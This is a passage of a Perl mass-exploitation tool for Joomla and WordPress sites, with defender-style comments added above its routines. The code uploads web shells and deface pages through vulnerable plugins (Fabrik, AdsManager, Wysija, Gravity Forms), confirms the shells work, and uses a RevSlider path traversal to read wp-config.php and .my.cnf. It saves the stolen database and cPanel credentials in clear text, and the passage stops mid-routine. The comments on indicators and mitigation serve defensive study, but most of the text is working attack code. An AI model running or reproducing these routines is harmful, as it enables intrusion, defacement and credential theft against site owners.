  694. if ($cont =~ /smtpport = \'(.*?)\';/){
  695. print color("red"),"\t[-]SMTP Port = $1 \n";
  696. print color 'reset';
  697. open (TEXT, '>>Result/databases.txt');
  698. print TEXT "[-]SMTP Port = $1\n";
  699. close (TEXT);
  700. }
  701. if ($cont =~ /smtphost = \'(.*?)\';/){
  702. print color("red"),"\t[-]SMTP Host = $1 \n\n";
  703. print color 'reset';
  704. open (TEXT, '>>Result/databases.txt');
  705. print TEXT "[-]SMTP Host = $1\n";
  706. close (TEXT);
  707.  
  708. }
  709.  
  710. }else{print " .............. ";
  711. print color('bold white');
  712. print "[";
  713. print color('reset');
  714. print color('bold red');
  715. print "NOT VULN";
  716. print color('reset');
  717. print color('bold white');
  718. print "] \n";
  719. print color('reset');
  720.  
  721. }
  722.  
  723. }
  724.  
  725. ####################################################################################################
  726. ####################################################################################################
  727. ####################################################################################################
  728. ####################################################################################################
  729. ####################################################################################################
  730.  
  # Joomla Fabrik module, first pass.
  # Posts the com_fabrik CSV-import form ($comfab) with the local file
  # gass.PhP.txt in the userfile field, then requests $site/media/gass.PhP.txt
  # and searches it for the marker "Fallagassrini". A match is logged to
  # Result/vulntargets.txt and Result/shells.txt.
  # $comfab, $def and $indfile are package globals assigned here and read again
  # by indecomfabr().
  # This user agent is created with verify_hostname => 0, so TLS certificate
  # hostname checks are disabled for its requests.
  # Defender note: indicators are gass.PhP.txt or gass.txt under /media/ and
  # POSTs to the option=com_fabrik ... view=import URL. Mitigation is updating
  # or removing Fabrik, keeping the import controller behind authentication,
  # and denying script execution in /media/.
  731. sub comfabr(){
  732. print colored ("[COM FABRIC]",'white on_red');
  733. $comfab= $site . '/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1';
  734. $def = $site . '/media/gass.txt';
  735. $fabshell = $site . '/media/gass.PhP.txt';
  736. ##
  737. $indfile="gass.txt";
  738. $shelfile="gass.PhP.txt";
  739. ##
  740. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  741. $ua->timeout(10);
  742. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  743. my $indfab = $ua->post("$comfab", Cookie => "", Content_Type => "form-data", Content => ["userfile" => ["$shelfile"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => "&quot;", "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]);
  744. my $checkfab = $ua->get("$fabshell")->content;
  745. if($checkfab =~/Fallagassrini/) {
  746. print " ................... ";
  747.  
  748. print color('bold white');
  749. print "[";
  750. print color('reset');
  751. print color('bold green');
  752. print "VULN";
  753. print color('reset');
  754. print color('bold white');
  755. print "] \n";
  756. print color('reset');
  757. open(save, '>>Result/vulntargets.txt');
  758. print save "[fabric] $site\n";
  759. close(save);
  760.  
  761. print "[SHELL LINK] => $fabshell\n";
  762. open (TEXT, '>>Result/shells.txt');
  763. print TEXT "[COM FABRIC] =>$fabshell \n";
  764. close (TEXT);
  765. }else{
  766. print " ............... ";
  767. print color('bold white');
  768. print "[";
  769. print color('reset');
  770. print color('bold red');
  771. print "NOT VULN";
  772. print color('reset');
  773. print color('bold white');
  774. print "] \n";
  775. print color('reset');
  776.  
  777. }
  778. }
  779. ############################################# INDEX ################################################
  780.  
  # Joomla Fabrik module, second pass.
  # Reads the package globals $comfab, $indfile and $def, none of which is
  # assigned in this sub (they are set in comfabr()). The file named by $indfile
  # is posted to the com_fabrik import form, then $def is requested and searched
  # for the marker "Hacked". A match is logged to Result/vulntargets.txt and
  # passed on to zoneh() and mirrorzon(), which are defined outside the visible
  # listing.
  # Defender note: the artefact to look for is /media/gass.txt, as set in
  # comfabr().
  781. sub indecomfabr(){
  782. print "[UPLOAD INDEX COM FABRIC] .......";
  783. print color('bold white');
  784. print "[";
  785. print color('reset');
  786. print color('bold blue');
  787. print "WAIT";
  788. print color('reset');
  789. print color('bold white');
  790. print "] \n";
  791. print color('reset');
  792. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  793. $ua->timeout(10);
  794. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  795. my $indfab = $ua->post("$comfab", Cookie => "", Content_Type => "form-data", Content => ["userfile" => ["$indfile"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => "&quot;", "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]);
  796. my $checkfab = $ua->get("$def")->content;
  797. if($checkfab =~/Hacked/) {
  798. open(save, '>>Result/vulntargets.txt');
  799. print save "[fabric] $site\n";
  800. close(save);
  801.  
  802. print "[DEFACE] .................... ";
  803. print color('bold white');
  804. print "[";
  805. print color('reset');
  806. print color('bold green');
  807. print "SUCCESS";
  808. print color('reset');
  809. print color('bold white');
  810. print "] \n";
  811. print color('reset');
  812.  
  813. print "[INDEX LINK] => $def\n";
  814. zoneh();
  815. mirrorzon();
  816. }else{
  817. print "[DEFACE] ...................... ";
  818. print color('bold white');
  819. print "[";
  820. print color('reset');
  821. print color('bold red');
  822. print "ERROR";
  823. print color('reset');
  824. print color('bold white');
  825. print "] \n";
  826. print color('reset');
  827.  
  828. }
  829. }
  830.  
  831. ####################################################################################################
  832. ####################################################################################################
  833. ####################################### COM USERS #############################################
  834. ####################################################################################################
  835. ####################################################################################################
  836.  
  # comusers: checks whether the Joomla com_users registration view is reachable on $site.
  # It performs a single GET and uploads nothing; a response body containing
  # "jform_email2-lbl" is reported as VULN and the site is appended to Result/vulntargets.txt.
  # $ua is assigned without "my", so it is the package-level $ua that other subs in this
  # file also read.
  # Detection: GETs of index.php?option=com_users&view=registration with the
  # "Gecko/20010801" User-Agent set below.
  # Mitigation: disable self-registration where it is not needed and keep Joomla core patched.
  837. sub comusers(){
  838. print colored ("[COM USER SCANNER]",'white on_red');
  839. $ua = LWP::UserAgent->new(keep_alive => 1);
  840. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  841. $ua->timeout (20);
  842.  
  843. my $exploit = "$site/index.php?option=com_users&view=registration";
  844. my $checkk = $ua->get("$exploit")->content;
  # Presumably a label id from the registration form; its presence is the only test made.
  845. if($checkk =~/jform_email2-lbl/) {
  846. print" ............. ";
  847. print color('bold white');
  848. print "[";
  849. print color('reset');
  850. print color('bold green');
  851. print "VULN";
  852. print color('reset');
  853. print color('bold white');
  854. print "] \n";
  855. print color('reset');
  856. open(save, '>>Result/vulntargets.txt');
  857. print save "[users] $site\n";
  858. close(save);
  859.  
  860. }else{
  861. print" ......... ";
  862. print color('bold white');
  863. print "[";
  864. print color('reset');
  865. print color('bold red');
  866. print "NOT VULN";
  867. print color('reset');
  868. print color('bold white');
  869. print "] \n";
  870. print color('reset');
  871. }
  872. }
  873.  
  874. ####################################################################################################
  875. ####################################################################################################
  876. ########################################## COM ADS MANAGER ##########################################
  877. ####################################################################################################
  878. ####################################################################################################
  # comadsmanegr: com_adsmanager upload routine for the index page.
  # Flow: multipart POST of the local file def.jpg to the component's upload task with the
  # stored name xGassx.html; if the response echoes that name the site is logged to
  # Result/vulntargets.txt, then $site/tmp/plupload/xGassx.html is fetched and, when its body
  # matches Hacked|Defaced|Fallag|Gassrini, zoneh(), mirrorzon() and adshell() are called.
  # Detection: POSTs to index.php?option=com_adsmanager&task=upload&tmpl=component whose
  # "name" field does not match the uploaded file's extension, and the file
  # tmp/plupload/xGassx.html on disk.
  # Mitigation: patch or remove the component, and serve tmp/plupload/ without script
  # execution (or not at all).
  879. sub comadsmanegr(){
  880. print colored ("[COM ADS MANAGER]",'white on_red');
  881. my $path = "/index.php?option=com_adsmanager&task=upload&tmpl=component";
  # Sets $target, which is not read again in this sub; the requests below use $site.
  882. if($site !~ /http:\/\//) { $target = "http://$site/"; };
  883. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  884. $ua->timeout(10);
  885. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  886. my $exploit = $ua->post("$site/$path", Cookie => "", Content_Type => "form-data", Content => [file => ["def.jpg"], name => "xGassx.html"]);
  887. if ($exploit->decoded_content =~ /xGassx.html/) {
  888. print " .............. [VULN]\n";
  889. open(save, '>>Result/vulntargets.txt');
  890. print save "[ads] $site\n";
  891. close(save);
  892.  
  893. print "[UPLOAD INDEX] ................... ";
  894. print color('bold white');
  895. print "[";
  896. print color('reset');
  897. print color('bold green');
  898. print "OK";
  899. print color('reset');
  900. print color('bold white');
  901. print "] \n";
  902. print color('reset');
  903.  
  # $def is a package global; zoneh()/mirrorzon() are defined elsewhere and presumably read it.
  904. $def="$site/tmp/plupload/xGassx.html";
  905. my $checkdef = $ua->get("$def")->content;
  906. if($checkdef =~/Hacked|Defaced|Fallag|Gassrini/) {
  907. print "[DEFACE] .................... ";
  908. print color('bold white');
  909. print "[";
  910. print color('reset');
  911. print color('bold green');
  912. print "SUCCESS";
  913. print color('reset');
  914. print color('bold white');
  915. print "] \n";
  916. print color('reset');
  917. print "[INDEX LINK] => $def\n";
  918. zoneh();
  919. mirrorzon();
  920. adshell();
  921. }
  922. }else{print " .......... ";
  923. print color('bold white');
  924. print "[";
  925. print color('reset');
  926. print color('bold red');
  927. print "NOT VULN";
  928. print color('reset');
  929. print color('bold white');
  930. print "] \n";
  931. print color('reset');
  932. }
  933. }
  934.  
  935.  
  936.  
  937.  
  # adshell: follow-up to comadsmanegr that sends loader.jpg under the name xGassrinix.php.
  # It declares no $ua of its own, so the package-level $ua is used.
  # Flow: POST to the com_adsmanager upload task; if the response echoes xGassrinix.php, GET
  # tmp/plupload/xGassrinix.php (result unused), then GET $site/xGSx.php and look for a
  # password form. On a match the URL is appended to Result/shells.txt and $site/un.php is
  # fetched and parsed for "path:" and "uname:" values, which are printed and logged too.
  # xGSx.php and un.php are presumably written by the uploaded loader; that payload is not
  # shown in this part of the file.
  # Detection / clean-up indicators: tmp/plupload/xGassrinix.php, /xGSx.php and /un.php under
  # the web root, and GETs for those paths right after an upload POST.
  938. sub adshell(){
  939.  
  940. print "[UPLOAD SHELL] ................... ";
  941. my $path = "/index.php?option=com_adsmanager&task=upload&tmpl=component";
  942. my $exploitxx = $ua->post("$site/$path", Cookie => "", Content_Type => "form-data", Content => [file => ["loader.jpg"], name => "xGassrinix.php"]);
  943. if ($exploitxx->decoded_content =~ /xGassrinix.php/) {
  944. print color('bold white');
  945. print "[";
  946. print color('reset');
  947. print color('bold green');
  948. print "OK";
  949. print color('reset');
  950. print color('bold white');
  951. print "] \n";
  952. print color('reset');
  953. print "[SCANING SHELL] ................ ";
  954. print color('bold white');
  955. print "[";
  956. print color('reset');
  957. print color('bold blue');
  958. print "WAIT";
  959. print color('reset');
  960. print color('bold white');
  961. print "] \n";
  962. print color('reset');
  963.  
  # $check is never read; only the second response is tested.
  964. my $check = $ua->get("$site/tmp/plupload/xGassrinix.php")->content;
  965. my $checkk = $ua->get("$site/xGSx.php")->content;
  966. if($checkk =~/<form method=post>Password: <input type=password name=pass><input type=submit value=/) {
  967. print "[SHELL] ......................";
  968. print color('bold white');
  969. print "[";
  970. print color('reset');
  971. print color('bold green');
  972. print "SUCCESS";
  973. print color('reset');
  974. print color('bold white');
  975. print "] \n";
  976. print color('reset');
  977. print "[SHELL LINK] => $site/xGSx.php\n";
  978. open(save, '>>Result/shells.txt');
  979. print save "[ADS] $site/xGSx.php\n";
  980. close(save);
  981. my $checkjo = $ua->get("$site/un.php")->content;
  # Captures $1 (path) and $2 (uname) from the un.php response.
  982. if($checkjo =~ /path:(.*)<b><br>uname:(.*)<br><\/b>fallagateam/){
  983. print "\n";
  984. print colored ("[PATH] : $1",'black on_yellow'),"\n\n";
  985. print colored ("[KERNEL]:$2",'black on_yellow'),"\n";
  986. print "\n";
  987. open(save, '>>Result/shells.txt');
  988.  
  989. print save "Path : $1\nKernel:$2\n";
  990.  
  991. close(save);
  992. }
  993. }else{
  994. print "[SHELL] ........................";
  995. print color('bold white');
  996. print "[";
  997. print color('reset');
  998. print color('bold green');
  999. print "ERROR";
  1000. print color('reset');
  1001. print color('bold white');
  1002. print "] \n";
  1003. print color('reset');
  1004. }
  1005.  
  1006. }
  1007. }
  1008. ####################################################################################################
  1009. ####################################################################################################
  1010. ############################# COM BLOG SCANNER ##################################################
  1011. ####################################################################################################
  1012. ####################################################################################################
  # comblog: probe for the com_myblog ajaxupload task on $site.
  # A single GET is made with the package-level client $uaa; nothing is uploaded. A body
  # containing "has been uploaded" is reported as VULN, the site is appended to
  # Result/vulntargets.txt and the operator is told to continue by hand.
  # Detection: GETs of index.php?option=com_myblog&task=ajaxupload with the "Gecko/20010801"
  # User-Agent set below.
  # Mitigation: patch or remove the component so the upload task is not reachable
  # unauthenticated.
  1013. sub comblog(){
  1014. print colored ("[COM BLOG SCANNER]",'white on_red');
  1015.  
  1016.  
  1017. $uaa = LWP::UserAgent->new(keep_alive => 1);
  1018. $uaa->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  1019. $uaa->timeout (10);
  1020.  
  1021. my $exploitblog = "$site/index.php?option=com_myblog&task=ajaxupload";
  1022. my $checkblog = $uaa->get("$exploitblog")->content;
  1023. if($checkblog =~/has been uploaded/) {
  1024. print" ............. ";
  1025. print color('bold white');
  1026. print "[";
  1027. print color('reset');
  1028. print color('bold green');
  1029. print "VULN";
  1030. print color('reset');
  1031. print color('bold white');
  1032. print "] \n";
  1033. print color('reset');
  1034. open(save, '>>Result/vulntargets.txt');
  1035. print save "[blog] $site\n";
  1036. close(save);
  1037.  
  1038. print "[ $site EXPLOIT IT MANUEL ]\n";
  1039. }
  1040. else {print " ......... ";
  1041. print color('bold white');
  1042. print "[";
  1043. print color('reset');
  1044. print color('bold red');
  1045. print "NOT VULN";
  1046. print color('reset');
  1047. print color('bold white');
  1048. print "] \n";
  1049. print color('reset');
  1050.  
  1051. }
  1052. }
  1053.  
  1054. ####################################################################################################
  1055. ####################################################################################################
  1056. ####################################################################################################
  1057. ####################################################################################################
  1058. ####################################################################################################
  1059. ####################################################################################################
  1060. ###################################### WORDPRESS #####################################
  1061. ####################################################################################################
  1062. ####################################################################################################
  1063. ####################################################################################################
  1064. ####################################################################################################
  1065. ####################################################################################################
  1066. ####################################################################################################
  1067. ############################################wysija #################################################
  1068. ####################################################################################################
  # wysija: theme-upload routine against the WordPress Wysija (MailPoet) campaigns page.
  # Side effects on globals: sets $zokometheme, rewrites $site to "http://$site/" when it has
  # no http:// prefix, and sets $def.
  # Flow: multipart POST of the local archive gassrini.zip to
  # /wp-admin/admin-post.php?page=wysija_campaigns&action=themes (response not inspected),
  # GET wp-content/uploads/wysija/themes/Gassrini/herewgo.php (result unused), then GET
  # $site/xGSx.php and look for a password form. On a match the site and URL are logged,
  # $site/un.php is parsed for path/uname, and $site/Gass.html is checked before calling
  # zoneh() and mirrorzon().
  # Detection / clean-up indicators: unauthenticated POSTs to admin-post.php with
  # action=themeupload; the directory wp-content/uploads/wysija/themes/Gassrini/; the files
  # herewgo.php, xGSx.php, un.php and Gass.html.
  # Mitigation: update the plugin, and block PHP execution under wp-content/uploads/.
  1069. sub wysija(){
  1070. print colored("[WYSIJA]",'white on_red');
  1071.  
  1072. $zokometheme = "my-theme";
  1073. my $path = "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes";
  1074. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  1075. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  1076. $ua->timeout(10);
  1077. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  1078.  
  1079.  
  1080. my $exploit = $ua->post("$site/$path", Content_Type => 'form-data', Content => [ $zokometheme => ['gassrini.zip', => 'gassrini.zip'], overwriteexistingtheme => "on",action => "themeupload", submitter => "Upload",]);
  1081.  
  # $check is never read; only the xGSx.php response decides the branch.
  1082. my $check = $ua->get("$site/wp-content/uploads/wysija/themes/Gassrini/herewgo.php")->content;
  1083. my $checkk = $ua->get("$site/xGSx.php")->content;
  1084. if($checkk =~/<form method=post>Password: <input type=password name=pass><input type=submit value=/) {
  1085. open(save, '>>Result/vulntargets.txt');
  1086. print save "[wysija] $site\n";
  1087. close(save);
  1088. print" ........................ ";
  1089. print color('bold white');
  1090. print "[";
  1091. print color('reset');
  1092. print color('bold green');
  1093. print "OK";
  1094. print color('reset');
  1095. print color('bold white');
  1096. print "] \n";
  1097. print color('reset');
  1098.  
  1099. print "[UPLOADING SHELL] ...........";
  1100.  
  1101. print color('bold white');
  1102. print "[";
  1103. print color('reset');
  1104. print color('bold green');
  1105. print "SUCCESS";
  1106. print color('reset');
  1107. print color('bold white');
  1108. print "] \n";
  1109. print color('reset');
  1110. print "[SHELL LINK] => $site/xGSx.php\n";
  1111. open(save, '>>Result/shells.txt');
  1112. print save "[WYSIJA] $site/xGSx.php\n";
  1113. close(save);
  1114. my $checkgasss = $ua->get("$site/un.php")->content;
  # Captures $1 (path) and $2 (uname) from the un.php response.
  1115. if($checkgasss =~ /path:(.*)<b><br>uname:(.*)<br><\/b>fallagateam/){
  1116. print "\n";
  1117. print colored ("[PATH] : $1",'black on_yellow'),"\n\n";
  1118. print colored ("[KERNEL]:$2",'black on_yellow'),"\n";
  1119. print "\n";
  1120. open(save, '>>Result/shells.txt');
  1121.  
  1122. print save "Path : $1\nKernel:$2\n";
  1123.  
  1124. close(save);
  1125. }
  1126. $def="$site/Gass.html";
  1127. my $fuckingcheck = $ua->get("$def")->content;
  1128. if($fuckingcheck =~m/Fallag|Hacked/i) {
  1129. zoneh();
  1130. mirrorzon();
  1131. }
  1132.  
  1133.  
  1134.  
  1135.  
  1136. }else {
  1137. print" ...................... ";
  1138.  
  1139. print color('bold white');
  1140. print "[";
  1141. print color('reset');
  1142. print color('bold RED');
  1143. print "ERROR";
  1144. print color('reset');
  1145. print color('bold white');
  1146. print "] \n";
  1147. print color('reset');
  1148. }
  1149. }
  1150. ####################################################################################################
  1151. ####################################################################################################
  1152. ######################################## GRAVITY FORMS #########################################
  1153. ####################################################################################################
  1154. ####################################################################################################
  1155.  
  # gravity: upload routine against the Gravity Forms ?gf_page=upload handler.
  # Side effects on globals: rewrites $site to "http://$site/" when it has no http:// prefix
  # and sets $def.
  # Flow: multipart POST of the local file Gass.jpg with name=Gass.php5 and a
  # gform_unique_id made of "../" segments; if the response contains "_input_3_Gass.php5"
  # the site is logged to Result/vulntargets.txt and the file URL to Result/libs.txt. The
  # uploaded file is then requested (result unused) and $site/xGSx.php is tested for a
  # password form. On a match the URL is logged and un.php is parsed; otherwise upindex()
  # is called.
  # Detection / clean-up indicators: requests to /?gf_page=upload whose gform_unique_id
  # contains "../", and files named _input_3_Gass.php5, xGSx.php, un.php or Gass.html under
  # the web root.
  # Mitigation: update the plugin, reject traversal sequences in upload identifiers at the
  # WAF or proxy, and make sure .php5 is not mapped to the PHP handler where it is not needed.
  1156. sub gravity(){
  1157. print colored ("[GRAVITY FORMS]",'white on_red');
  1158. my $path = "/?gf_page=upload";
  1159. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  1160. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  1161. $ua->timeout(10);
  1162. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  1163. my $exploitgrav = $ua->post("$site/$path", Cookie => "", Content_Type => "form-data", Content => [file => ["Gass.jpg"], field_id => "3", form_id => "1",gform_unique_id => "../../../../../", name => "Gass.php5"]);
  1164. if ($exploitgrav->decoded_content =~ /_input_3_Gass.php5/) {
  1165. print " ................ ";
  1166. print color('bold white');
  1167. print "[";
  1168. print color('reset');
  1169. print color('bold green');
  1170. print "VULN";
  1171. print color('reset');
  1172. print color('bold white');
  1173. print "] \n";
  1174. print color('reset');
  1175. open(save, '>>Result/vulntargets.txt');
  1176. print save "[gravi] $site\n";
  1177. close(save);
  1178.  
  1179. print "[SCANING SHELL] ............ ";
  1180. open(save, '>>Result/libs.txt');
  1181. print save "$site/_input_3_Gass.php5\n";
  1182. close(save);
  # $checkgrav is never read; only the xGSx.php response decides the branch.
  1183. my $checkgrav = $ua->get("$site/_input_3_Gass.php5")->content;
  1184. my $checkkgrav = $ua->get("$site/xGSx.php")->content;
  1185. if($checkkgrav =~/<form method=post>Password: <input type=password name=pass><input type=submit value=/) {
  1186. print color('bold white');
  1187. print "[";
  1188. print color('reset');
  1189. print color('bold green');
  1190. print "UPLODED";
  1191. print color('reset');
  1192. print color('bold white');
  1193. print "] \n";
  1194. print color('reset');
  1195. print "[SHELL LINK] => $site/xGSx.php \n";
  1196. open(save, '>>Result/shells.txt');
  1197. print save "[GRAVITY] $site/xGSx.php\n";
  1198. close(save);
  1199.  
  1200. # get uname and path on server
  1201. my $checkgasss = $ua->get("$site/un.php")->content;
  1202. if($checkgasss =~ /path:(.*)<b><br>uname:(.*)<br><\/b>fallagateam/){
  1203. print "\n";
  1204. print colored ("[PATH] : $1",'black on_yellow'),"\n\n";
  1205. print colored ("[KERNEL]:$2",'black on_yellow'),"\n";
  1206. print "\n";
  1207. open(save, '>>Result/shells.txt');
  1208. print save "Path : $1\nKernel:$2\n";
  1209. close(save);
  # zoneh()/mirrorzon() run only when the un.php pattern matched.
  1210. $def="$site/Gass.html";
  1211. zoneh();
  1212. mirrorzon();
  1213. }
  1214. #### get info Done ..////
  1215.  
  1216.  
  1217.  
  1218. }else{
  1219.  
  1220. print color('bold white');
  1221. print "[";
  1222. print color('reset');
  1223. print color('bold red');
  1224. print "ERROR!!";
  1225. print color('reset');
  1226. print color('bold white');
  1227. print "] \n";
  1228. print color('reset');
  1229. upindex();
  1230.  
  1231.  
  1232.  
  1233. }
  1234.  
  1235.  
  1236.  
  1237.  
  1238.  
  1239. }else{ print " ............ ";
  1240. print color('bold white');
  1241. print "[";
  1242. print color('reset');
  1243. print color('bold red');
  1244. print "NOT VULN";
  1245. print color('reset');
  1246. print color('bold white');
  1247. print "] \n";
  1248. print color('reset');
  1249. }
  1250. }
  1251.  
  # upindex: fallback called by gravity() when the xGSx.php check fails.
  # Sends the local file def.jpg to the same /?gf_page=upload handler with name=Gass.html and
  # the same "../" gform_unique_id. If the response contains "_input_3_Gass.html", $def is
  # set to $site . '_input_3_Gass.html' and zoneh()/mirrorzon() are called.
  # Detection / clean-up indicator: a file named _input_3_Gass.html at the traversal target,
  # together with the request pattern described for gravity().
  1252. sub upindex{
  1253. my $path = "/?gf_page=upload";
  1254. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  1255. $ua->timeout(10);
  1256. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  1257. my $indexploit = $ua->post("$site/$path", Cookie => "", Content_Type => "form-data", Content => [file => ["def.jpg"], field_id => "3", form_id => "1",gform_unique_id => "../../../../../", name => "Gass.html"]);
  1258. print "[DEFACE] ....................";
  1259. if ($indexploit->decoded_content =~ /_input_3_Gass.html/) {
  # Plain concatenation with no added separator between $site and the file name.
  1260. $def= $site . '_input_3_Gass.html';
  1261. print color('bold white');
  1262. print " [";
  1263. print color('reset');
  1264. print color('bold green');
  1265. print "SUCCESS";
  1266. print color('reset');
  1267. print color('bold white');
  1268. print "] ";
  1269. print color('reset');
  1270. print"\n";
  1271. print colored ("[INDEX LINK] => $def ",'black on_red'),"\n";
  1272. zoneh();
  1273. mirrorzon();
  1274. }else{
  1275. print ".. [ERROR]\n";
  1276. }
  1277. }
  1278. ####################################################################################################
  1279. ####################################################################################################
  1280. ##################################### REVSLIDER ########################################
  1281. ####################################################################################################
  1282. ####################################################################################################
  # getconfig: reads wp-config.php through the revslider_show_image AJAX action.
  # All variables here ($ua, $config, $conflink, $resp, $conttt, $cont, $pass) are package
  # globals; $pass is later read by wpbrute().
  # Flow: GET wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php; if
  # the body contains DB_NAME the site is logged, the URL is fetched a second time and the
  # DB_NAME, DB_USER, DB_PASSWORD and DB_HOST values are extracted by regex, printed and
  # appended in clear text to Result/databases.txt. wpbrute() and getcpconfig() are called
  # from inside the while loop; the not-vulnerable branch calls getcpconfig() only.
  # Detection: admin-ajax.php requests with action=revslider_show_image whose img parameter
  # contains "../" or names a .php file, answered with a 200 and a non-image body.
  # Response: if such a request succeeded, treat the database credentials and the
  # WordPress keys/salts in wp-config.php as disclosed and rotate them; update the plugin.
  1283. sub getconfig{
  1284. print colored ("[REVSLIDER GETCONFIG]",'white on_red');
  1285. $ua = LWP::UserAgent->new(keep_alive => 1);
  1286. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  1287. $ua->timeout (10);
  1288. $config = "wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php";
  1289. $conflink = "$site/$config";
  1290. $resp = $ua->request(HTTP::Request->new(GET => $conflink ));
  1291. $conttt = $resp->content;
  1292. if($conttt =~ m/DB_NAME/g){
  1293. print " .......... ";
  1294. print color('bold white');
  1295. print "[";
  1296. print color('reset');
  1297. print color('bold green');
  1298. print "VULN";
  1299. print color('reset');
  1300. print color('bold white');
  1301. print "] \n";
  1302. print color('reset');
  1303. open(save, '>>Result/vulntargets.txt');
  1304. print save "[rev cnfg] $site\n";
  1305. close(save);
  # Same URL requested a second time; the extraction below works on this second response.
  1306. $resp = $ua->request(HTTP::Request->new(GET => $conflink ));
  1307. $cont = $resp->content;
  1308. while($cont =~ m/DB_NAME/g){
  1309.  
  1310.  
  1311. if ($cont =~ /DB_NAME\', \'(.*)\'\)/){
  1312. print color("red"),"\t[-]Database Name = $1 \n";
  1313. print color 'reset';
  1314. open (TEXT, '>>Result/databases.txt');
  1315. print TEXT "\n[ DATABASE ] \n$site\n[-]Database Name = $1";
  1316. close (TEXT);
  1317. }
  1318. if ($cont =~ /DB_USER\', \'(.*)\'\)/){
  1319. print color("white"),"\t[-]Database User = $1 \n";
  1320. print color 'reset';
  1321. open (TEXT, '>>Result/databases.txt');
  1322. print TEXT "\n[-]Database User = $1";
  1323. close (TEXT)
  1324. }
  1325. if ($cont =~ /DB_PASSWORD\', \'(.*)\'\)/){
  1326. print color("red"),"\t[-]Database Password = $1 \n";
  1327. print color 'reset';
  # Kept in the global $pass, which wpbrute() submits as a WordPress login password.
  1328. $pass= $1 ;
  1329. open (TEXT, '>>Result/databases.txt');
  1330. print TEXT "\nDatabase Password = $pass";
  1331. close (TEXT)
  1332. }
  1333. if ($cont =~ /DB_HOST\', \'(.*)\'\)/){
  1334. print color("white"),"\t[-]Database Host = $1 \n\n";
  1335. print color 'reset';
  1336. open (TEXT, '>>Result/databases.txt');
  1337. print TEXT "\n[-]Database Host = $1";
  1338. close (TEXT)
  1339. }
  1340.  
  1341. wpbrute();
  1342. getcpconfig();
  1343. }}else{
  1344. print " ...... ";
  1345. print color('bold white');
  1346. print "[";
  1347. print color('reset');
  1348. print color('bold red');
  1349. print "NOT VULN";
  1350. print color('reset');
  1351. print color('bold white');
  1352. print "] \n";
  1353. print color('reset');
  1354. getcpconfig();
  1355.  
  1356. }
  1357.  
  1358. }
  1359.  
  1360. ####################################################################################################
  1361. ####################################################################################################
  1362.  
  # getcpconfig: uses the same revslider_show_image action to request ../../.my.cnf.
  # All variables here are package globals ($ua, $cpup, $cpuplink, $resp, $cont, $contt).
  # Flow: GET the URL; if the body contains "user=" the site is logged to
  # Result/vulntargets.txt, the URL is fetched again, and the values after user= and inside
  # password="..." are printed and appended in clear text to Result/cpanels.txt.
  # Detection: admin-ajax.php requests with action=revslider_show_image and an img value
  # ending in .my.cnf or containing "../".
  # Response: if such a request succeeded, rotate the credentials stored in that .my.cnf and
  # any account that shares them; keep client credential files outside anything the web
  # server user can read where possible.
  1363. sub getcpconfig{
  1364. print colored ("[REVSLIDER GET CPANEL]",'white on_red');
  1365. $ua = LWP::UserAgent->new(keep_alive => 1);
  1366. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  1367. $ua->timeout (10);
  1368. $cpup = "wp-admin/admin-ajax.php?action=revslider_show_image&img=../../.my.cnf";
  1369. $cpuplink = "$site/$cpup";
  1370. $resp = $ua->request(HTTP::Request->new(GET => $cpuplink ));
  1371. $cont = $resp->content;
  1372. if($cont =~ m/user=/g){
  1373. print " ...... ";
  1374. print color('bold white');
  1375. print "[";
  1376. print color('reset');
  1377. print color('bold green');
  1378. print "FOUNDED";
  1379. print color('reset');
  1380. print color('bold white');
  1381. print "] \n";
  1382. print color('reset');
  1383. open(save, '>>Result/vulntargets.txt');
  1384. print save "[rev cpnl] $site\n";
  1385. close(save);
  # Same URL requested a second time; the extraction below works on this second response.
  1386. $resp = $ua->request(HTTP::Request->new(GET => $cpuplink ));
  1387. $contt = $resp->content;
  1388. while($contt =~ m/user/g){
  1389. if ($contt =~ /user=(.*)/){
  1390.  
  1391. print color("red"),"\n\t[-]Cpanel User = $1 \n";
  1392. print color 'reset';
  1393. open (TEXT, '>>Result/cpanels.txt');
  1394. print TEXT "\n[ cpanel ] \n$site\n[-]cpanel user = $1";
  1395. close (TEXT);
  1396. }
